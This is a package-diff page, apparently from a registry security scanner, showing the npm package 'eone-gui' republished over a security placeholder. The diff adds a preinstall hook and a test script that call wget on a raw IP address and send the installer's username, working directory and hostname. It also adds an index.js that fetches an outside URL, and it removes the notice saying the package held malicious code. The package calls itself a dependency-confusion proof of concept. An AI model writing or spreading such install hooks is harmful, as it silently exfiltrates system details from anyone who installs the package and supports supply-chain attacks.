eone-gui 0.0.1-security → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of eone-gui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +2 -4
  2. package/index.js +13 -0
  3. package/package.json +16 -3
package/README.md CHANGED
@@ -1,5 +1,3 @@
1
- # Security holding package
1
+ # eone-gui
2
+ npm package
2
3
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=eone-gui for more information.
package/index.js ADDED
@@ -0,0 +1,13 @@
1
+ exports.printMsg = function() {
2
+ fetch("https://bitpanda.ac/zionakompis", {
3
+ "headers": {
4
+ "accept": "text/html",
5
+ "accept-language": "en-US,en;q=0.9",
6
+ "cache-control": "no-cache",
7
+ "pragma": "no-cache",
8
+ },
9
+ "body": null,
10
+ "method": "GET"
11
+ });
12
+ console.log("zionskompis");
13
+ }
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "eone-gui",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.2",
4
+ "description": "PoC -testing dependency confusion vulnerabilities.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"http://18.193.85.88/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
8
+ "preinstall": "wget --quiet \"http://18.193.85.88/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
9
+ },
10
+ "keywords": [
11
+ "test",
12
+ "PoC"
13
+ ],
14
+ "config": {
15
+ "unsafe-perm": true
16
+ },
17
+ "author": "zionskompis",
18
+ "license": "MIT"
6
19
  }